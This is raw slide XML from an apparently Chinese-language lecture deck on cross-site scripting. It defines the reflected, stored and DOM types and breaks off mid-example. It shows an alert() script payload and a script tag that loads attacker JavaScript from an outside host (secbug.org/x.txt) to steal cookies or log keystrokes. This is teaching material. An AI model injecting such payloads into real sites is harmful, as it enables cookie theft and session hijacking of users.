                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>PrintStr </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>页 面</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2054993" y="1431097"/>
            <a:ext cx="434340" cy="120014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1270" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码如下：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1920204"/>
            <a:ext cx="3402329" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="44450" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="350"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>当攻击者输入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(xss/)&lt;/scrip&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时，将触发</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="259"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击者可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>与</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>之间输入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码，实现一些“特殊效果”。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130">
              <a:lnSpc>
                <a:spcPts val="605"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在真实的攻击中，攻击者不仅仅弹出一个</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>框，通常还使用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130">
              <a:lnSpc>
                <a:spcPts val="605"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>sr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>c="http://www.secbug.org/x.txt"&gt;&lt;/scrip&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>方式来加载外部脚本，而在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>x.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>中就存放着</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="16510">
              <a:lnSpc>
                <a:spcPct val="77700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击者的恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码，这段代码可能是用来盗取用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>也可能是监控 键盘记录等。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125103" y="1123823"/>
            <a:ext cx="2248661" cy="868680"/>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4</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61117" y="621993"/>
            <a:ext cx="1593850" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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0">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715397" y="832223"/>
            <a:ext cx="3415665" cy="807720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="62865" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pP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主要被分为三类，分别</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：反射型、存储型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>反射型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也被称为非持久性</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。当用户访问一个带有</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代码的</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请求时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>服 务器端接收数据后处</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>理</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，然后把带</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>有</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代码的数据发送到浏览</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>器</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，浏览器解析 这段带有</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代码的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>后</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，最终造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>成</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漏洞。这个过程就像一</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>次反射</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>故称为 反射型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a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>下面举例说明反射型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跨站漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331593" y="2119757"/>
            <a:ext cx="1762760" cy="125730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-40" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>程序先接</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>收</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>usernam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>值再将其输出</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906658" y="2105704"/>
            <a:ext cx="3023235" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13970" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="860"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="110"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="2186940" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在这段</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="750" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，如果恶意用户输入</a:t>
            </a:r>
            <a:endParaRPr sz="750">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="150495">
              <a:lnSpc>
                <a:spcPts val="860"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
